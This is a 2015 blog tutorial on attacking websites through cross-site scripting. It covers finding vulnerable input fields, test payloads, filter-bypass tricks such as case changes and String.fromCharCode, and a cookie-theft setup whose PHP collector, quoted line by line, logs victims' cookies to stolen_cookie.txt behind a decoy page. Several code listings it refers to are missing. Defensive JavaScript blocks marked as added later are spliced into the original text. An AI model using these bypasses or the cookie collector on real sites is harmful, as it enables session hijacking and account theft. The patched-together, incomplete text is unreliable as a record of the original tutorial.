
Monday, 2 March 2015

XSS Complete Tutorial Website Hacking

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?

Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects his malicious JavaScript code into a legitimate website. When a user visits the specially-crafted link, the malicious JavaScript executes. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts and even build worms.


Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injected a malicious script. When a user visits the site, the malicious script executes. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using the stolen cookies, he can log in to your account and change the password.
It will be easy to understand XSS if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of the HTTP client-server architecture (Reference).
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP).

XSS Attack:
Step 1: Finding a Vulnerable Website
Hackers use Google dorks such as "?search= or ".php?q= to find vulnerable sites. Elite (1337) hackers target specific sites instead of using Google search. If you are going to test your own site, you have to check every page of your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field into which we can inject our own script, for example a search box, a username or password field, or any other input field.

[Image: search+box.jpg]

Test 1:
Once we have found the input field, let us try to put some string into it, for instance "BTS". The page will display the result.
[Image: XSS_input.gif]

Now right-click on the page and select View Source. Search for the string "BTS" that we entered in the input field and note the location where the input is placed.
[Image: BTS_XSS.gif]


Test 2:
Now we are going to check whether the server sanitizes our input or not. To do this, let us input the <script> tag in the input field.
[Image: Xss_script_tag.gif]
View the source of the page and find the location where the input was displayed in the previous test.
[Image: xss-SUCCESS_Noparsing.gif]

Thank god, our code is not sanitized by the server: the code is exactly the same as what we entered in the field. If the server sanitized our input, the code would look like &lt;script&gt; (the angle brackets encoded as HTML entities) instead. This indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the Vulnerability
Now we know the site is somewhat vulnerable to XSS. But let us make sure the site is completely vulnerable by injecting full JavaScript code.
Code:
For instance, let us input <script>alert('BTS')</script>.
[Image: injecting-XSS.gif]

Now it will display a pop-up box with the string 'BTS'. Finally, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.
[Image: alert-box-xss.gif]

Types of XSS Based on Persistence:
Based on persistence, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

Persistent XSS:

A Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database and is then permanently served as part of a normal page.

For Example: 
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input, the injected script is executed whenever a user reads the post. If the injected code is cookie-stealing code, it will steal the cookie of every user who reads the post, and using that cookie the attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in an HTTP request. The server embeds the input in the HTML page and returns it (the HTTP response) to the browser. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project hosting website. To find our favorite project, we input a related word in the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, the injected script is executed.

In a reflected XSS attack, the attacker sends a specially-crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects the attack back to the user's browser, and the browser executes the code.

In addition to these types, there is a third type called DOM Based XSS; I will explain this attack in later posts.


What can an attacker do with this Vulnerability?
  • Stealing identity and confidential data (credit card details)
  • Bypassing restrictions in websites
  • Session hijacking (stealing the session)
  • Malware attacks
  • Website defacement
  • Denial of Service attacks (DoS)


Complete Cross Site Scripting Walkthrough


Introduction
'XSS', also known as 'CSS' (Cross Site Scripting), is a very common vulnerability found in web applications. XSS allows the attacker to inject malicious code; the root cause is that the developer trusts user input, or filters it incorrectly, and then sends the user's input data back to the client browser, where the malicious code executes.

XSS is Dangerous
XSS is really dangerous and its severity is High, because it can change the website's DOM and can lead to stealing the administrator's credentials; in that case the attacker can control and compromise the whole application.

What does the attacker want to achieve?
• Changing settings
• Cookie theft
• False advertising
• Stealing form tokens to make CSRF easier
• And more; you have to be creative to exploit XSS.

XSS Types
There are three types of XSS:
• Persistent (Stored) XSS: the attack is stored on the website's server
• Non-Persistent (Reflected) XSS: the user has to follow a special link to be exposed
• DOM-based XSS: the problem exists within the client-side script
We will discuss each of these kinds in detail, as you will see.
Persistent (Stored) XSS
Wikipedia definition: The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply put, Persistent XSS occurs when the developer stores the user's input data in a database server, or simply writes it to a file, without proper filtering, and then sends it back to the client browser.

Persistent (Stored) XSS Demo
Here is the PHP code that suffers from Persistent XSS:

The two parameters in that code, "message" and "name", are not sanitized properly; we store these parameters in the guestbook table, so when we display them back to the client browser, the malicious JavaScript code executes. To demonstrate this we will exploit the DVWA application.

After submitting this form, our JS code has been executed.


Non Persistent (Reflected) XSS 
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request. 

Non Persistent (Reflected) XSS Demo 
Here is the PHP code that suffers from Reflected XSS:

As you can see, the "name" parameter is not sanitized and is echoed back to the user, so when the user injects malicious JS code, it executes. Now we will inject our malicious JS code. For the demonstration we will inject

<script>alert(/xss/)</script>

To demonstrate this we will exploit the DVWA application. We will inject the alert box code "<script>alert("xss")</script>".
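The fix for both the guestbook (stored) and the search page (reflected) is the same: HTML-encode untrusted data at the point where it is written into the page. The following is an added example, not the tutorial's PHP or DVWA code; it models the two pages as string-rendering functions, with `escapeHtml` doing what PHP's `htmlspecialchars($s, ENT_QUOTES)` does, and the probe string is the one used in the post.

```javascript
// Added example (not from the original post): the search page and guestbook
// from the tutorial, modelled as plain string-rendering functions so the
// difference between echoing input and HTML-encoding it is visible.

// Encode the five characters that matter in HTML text and attribute contexts.
// This is the same transformation PHP's htmlspecialchars($s, ENT_QUOTES) does.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected XSS: the "search results for <word>" page. The vulnerable version
// copies the query parameter straight into the HTML body.
function renderSearchVulnerable(term) {
  return `<p>search results for ${term}</p>`;
}

function renderSearchSafe(term) {
  return `<p>search results for ${escapeHtml(term)}</p>`;
}

// Stored XSS: the guestbook. Entries come from the database, but they were
// user input when they went in, so they are still untrusted when they come out.
function renderGuestbookVulnerable(entries) {
  return entries.map(e => `<li><b>${e.name}</b>: ${e.message}</li>`).join('\n');
}

function renderGuestbookSafe(entries) {
  return entries
    .map(e => `<li><b>${escapeHtml(e.name)}</b>: ${escapeHtml(e.message)}</li>`)
    .join('\n');
}

// Does the rendered HTML still contain a live <script> tag? A quick check for
// the tests below; a real review would inspect the rendered DOM instead.
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the probe used in the tutorial.
const PROBE = "<script>alert('BTS')</script>";
```

Encoding must match the context the data lands in: `escapeHtml` is right for the HTML body and quoted attributes, but data written into a `<script>` block or a URL needs the encoding for that context instead.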


DOM based XSS
DOM-based vulnerabilities occur in the content-processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML content, the Document Object Model (DOM); JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting on the DOM. Simply put, this type occurs in the JavaScript code itself that the developer uses on the client side. For example: "A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping, entirely on the client side."

DOM based XSS Demo 

Suppose the following code is used to create a form that lets the user choose his/her preferred language. A default language is also provided in the query string, as the parameter "default". We will use the following code for demonstration purposes:

The page is invoked with a URL such as http://www.some.site/page.html?default=French. A DOM Based XSS attack against this page can be accomplished by sending the following URL to a victim: http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
The original JavaScript code in the page does not expect the default parameter to contain HTML markup, so it simply echoes it into the page (DOM) at runtime. The browser then renders the resulting page and executes the attacker's script: alert(document.cookie)
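The same language chooser can be built so that the "default" parameter never reaches the DOM as markup. This is an added example, not the tutorial's page.html: the parameter is only compared against an allowlist, and the `<option>` elements are built from the allowlist entries; the language list, the fallback and the `language` element id are assumptions.

```javascript
// Added example (not the tutorial's own code): a safe way to build the
// language chooser. The attacker controls the "default" query parameter, so
// it is only ever compared against an allowlist; the markup is built from the
// allowlist entries, never from the raw parameter.

const LANGUAGES = ['English', 'French', 'German', 'Spanish']; // constructed allowlist
const FALLBACK = 'English';                                     // assumed default

// Parse ?default=... from a location.search string. URLSearchParams decodes
// percent-encoding and '+' for us, so "%3Cscript%3E" is seen as "<script>".
function selectDefaultLanguage(search, allowed = LANGUAGES, fallback = FALLBACK) {
  const params = new URLSearchParams(search);
  const requested = params.get('default');
  // Exact match against the allowlist; anything else, including the
  // <script>alert(document.cookie)</script> payload, becomes the fallback.
  return allowed.includes(requested) ? requested : fallback;
}

// Build the <option> list as a string. Only allowlisted constants reach the
// markup, which is why this string is safe even if it is assigned to innerHTML.
function buildLanguageOptions(selected, allowed = LANGUAGES) {
  return allowed
    .map(l => `<option value="${l}"${l === selected ? ' selected' : ''}>${l}</option>`)
    .join('');
}

// The preferred form in a real page: build elements with the DOM API so no
// HTML parsing happens at all. `doc` is the browser document (absent under
// Node, so this function is only called when a DOM exists); the <select>
// element id "language" is an assumption.
function installLanguageSelect(doc, search) {
  const select = doc.getElementById('language');
  const chosen = selectDefaultLanguage(search);
  select.textContent = '';
  for (const l of LANGUAGES) {
    const opt = doc.createElement('option');
    opt.value = l;
    opt.textContent = l;          // textContent never interprets markup
    opt.selected = (l === chosen);
    select.appendChild(opt);
  }
}
```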
Now that we have discussed all types of XSS, let's talk about some advanced techniques.

Advanced Techniques
There are some avoidance techniques that can be taken to protect against XSS exploits, but they are often not implemented well. For example, tons of sites may seem vulnerable but do not execute the code, because some kind of filtering method is in place; those filters can often be bypassed, and we will demonstrate most of them.

METHOD 1: replace <script> with the null string ""
Here is the vulnerable code that suffers from reflected XSS and has a filter:

As you can see, in the previous code the developer replaces the string "<script>" with the null string "".
A common method to bypass the filter is simply to replace the string "<script>" with "<SCRIPT>", because the developer searches for the lowercase "<script>" only, so we bypass

it by changing our script to <SCRIPT>.......</SCRIPT>
Here is another way to bypass the previous filter:

<script type=text/javascript>alert("XSS")</script>

Please note it is bad practice to use alert("XSS") to test for XSS because most well-known sites already block the keyword XSS.

METHOD 2: magic quotes filtering
In this technique, the developer uses a technique called magic quotes filtering: a PHP function called "addslashes()" adds a slash before any special characters, so our traditional JavaScript code doesn't work.

There are many ways to bypass that filter; we will discuss two of them.
1- The easiest way to bypass it is just DON'T USE quotes, simple as that; for example, declare a variable, assign a number to it, then alert that variable, as you can see here: <script>var val=1;alert(val)</script>

2- This way is somewhat tricky: we use a built-in function that converts decimal values into ASCII characters. You can find a complete ASCII table at http://www.asciitable.com/, which will help you write what you want, or you can use the HackBar Firefox add-on to help you convert ASCII to decimal. In my example I will be writing "XSS", which is "120 115 115" in decimal. Now that we have the decimal value of our string, we need to know which JavaScript function converts it back to ASCII: this function is called "String.fromCharCode()", and to use it with alert, for example, you don't need quotes any more.
<script>alert(String.fromCharCode(120,115,115))</script>

Now this will display our message, in this case "XSS". This method is very useful for bypassing magic quotes.
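From the defender's side, the lesson of METHOD 1 and METHOD 2 is that a blacklist filter has to be tested against known variants, and that it is not a substitute for output encoding. The block below is an added example (not from the original post): it models the two filters the post describes, `stripScriptTag` (remove the literal `<script>`) and `addSlashes` (PHP `addslashes()` behaviour), and reports which of the post's own payloads pass through each one unchanged.

```javascript
// Added example (not from the original post): a small harness for testing a
// blacklist filter against the bypasses the tutorial lists. The two filters
// model METHOD 1 and METHOD 2; the probes are the payloads quoted above.

// METHOD 1: remove the literal string "<script>" (case-sensitive), exactly as
// the tutorial describes the developer doing.
function stripScriptTag(input) {
  return input.split('<script>').join('');
}

// METHOD 2: PHP addslashes() behaviour: a backslash before ' " \ and NUL.
function addSlashes(input) {
  return input.replace(/([\\'"])/g, '\\$1').replace(/\0/g, '\\0');
}

// Detection rule: does the output still open a script element? Case-insensitive
// and tolerant of attributes after the tag name. It deliberately looks only
// for <script>; event-handler attributes would need their own rule.
function hasActiveScript(html) {
  return /<script\b/i.test(html);
}

// Run a filter over a list of probes and return the probes the filter did not
// touch at all while they still carry a live script tag.
function auditFilter(filter, probes) {
  return probes.filter(p => {
    const out = filter(p);
    return out === p && hasActiveScript(out);
  });
}

// Constructed probes, taken from the payloads shown in the post.
const PROBES = [
  "<script>alert('BTS')</script>",                            // plain
  "<SCRIPT>alert('BTS')</SCRIPT>",                            // case change
  '<script type=text/javascript>alert("XSS")</script>',       // attribute breaks the literal match
  '<script>var val=1;alert(val)</script>',                    // no quotes at all
  '<script>alert(String.fromCharCode(120,115,115))</script>', // fromCharCode, no quotes
];
```

Each filter stops some probes and misses others, which is the expected result for a blacklist; encoding on output (htmlspecialchars and friends) handles every one of them the same way.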

How Can an Attacker Steal Cookies?
When you first hear about stealing cookies, you may think it needs hard work to implement or even to understand, but I tell you it is very simple: you just need some programming background and an XSS vulnerability, simple as that.
The cookie-stealing scenario is this: we create a PHP file called collect_cookie.php and upload it to any web hosting company; after that we inject JavaScript code that sends the cookies to our malicious website; when the PHP file receives the cookie information, it saves it in a file called stolen_cookie.txt.
To steal cookies, we need a few things:
• A PHP script that will receive the cookie
• The JavaScript code that will steal the cookie and send it to our malicious site
• A web hosting company that will host our PHP file

First: collect_cookie.php
Here is the PHP script we will use to collect cookies and save them into stolen_cookie.txt:

So let's understand what the script does:
$collectedCookie=$HTTP_GET_VARS["cookie"];
In this line we take the data stored in the GET variable called cookie and store it in a variable called collectedCookie.
$date=date("l ds of F Y h:i:s A");
Here we store the date the connection occurred; it tells us when these cookies were stolen.

$user_agent=$_SERVER['HTTP_USER_AGENT'];

Here we store the victim's user agent for further attacks, if needed.

$file=fopen('stolen_cookie.txt','a');

Here we open (creating it if necessary) a file called stolen_cookie.txt that holds the victims' cookie information.

fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$collectedCookie \n");

Here we save the data in this format ("DATE: || USER AGENT || COOKIE").
fclose($file);
Here we close the file handle.

echo '<b>Sorry , this page is under construction</b></br></br>

Please Click<a href="http://www.google.com/">here</a> to go back to previous page ';
Here we print a message on the screen ("Sorry, this page is under construction") and give the victim a link that sends him to Google.
Here we have finished the first file, which will collect the cookie information.

Second: JavaScript code

Here is the JavaScript code that we will inject into the victim server or browser.
We can inject either of these scripts:

This script needs user interaction because it prints a link to the user; if the user clicks on that link, the redirection to our site with the cookie information is done.

This script doesn't need user interaction: here we inject an iframe into the victim website, and it is hidden so the victim can't see it, and the connection is made.
Finally we will find the cookies by browsing the file called stolen_cookie.txt.
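The server-side mitigation for this cookie theft is the HttpOnly attribute: a cookie set with it is never exposed through document.cookie, so the injected script has nothing to send to collect_cookie.php. The following is an added example, not part of the original post; it builds a hardened Set-Cookie header and audits an existing one, with the cookie name and value as constructed sample data.

```javascript
// Added example (not from the original post): the server-side mitigation for
// the cookie theft described above. A cookie sent with the HttpOnly flag is
// not exposed through document.cookie, so a script that runs via XSS cannot
// read it. These helpers build a hardened Set-Cookie header and audit an
// existing one; the cookie name and value are constructed sample data.

// Build a session cookie header carrying the attributes a session cookie needs.
function buildSessionCookie(name, value, { maxAge = 3600, path = '/' } = {}) {
  if (!/^[\w-]+$/.test(name)) throw new Error('invalid cookie name');
  if (/[\s;,"\\]/.test(value)) throw new Error('invalid cookie value');
  return [
    `${name}=${value}`,
    `Path=${path}`,
    `Max-Age=${maxAge}`,
    'Secure',         // only sent over HTTPS
    'HttpOnly',       // not readable from document.cookie
    'SameSite=Lax',   // not attached to most cross-site requests
  ].join('; ');
}

// Parse a Set-Cookie header value into its name, value and a map of
// attributes (attribute names are case-insensitive per RFC 6265).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const attributes = {};
  for (const a of attrs) {
    const i = a.indexOf('=');
    const key = (i < 0 ? a : a.slice(0, i)).toLowerCase();
    attributes[key] = i < 0 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Report what is missing on a session cookie. Returns [] when it is hardened.
function auditSessionCookie(header) {
  const { attributes } = parseSetCookie(header);
  const findings = [];
  if (!attributes.httponly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!attributes.secure) findings.push('missing Secure: sent over plain HTTP');
  const ss = String(attributes.samesite || '').toLowerCase();
  if (ss !== 'lax' && ss !== 'strict') findings.push('SameSite not Lax/Strict');
  return findings;
}
```

HttpOnly only stops the script from reading the cookie; a script that still runs in the victim's browser can act with that session directly, so the XSS itself has to be fixed with output encoding as well.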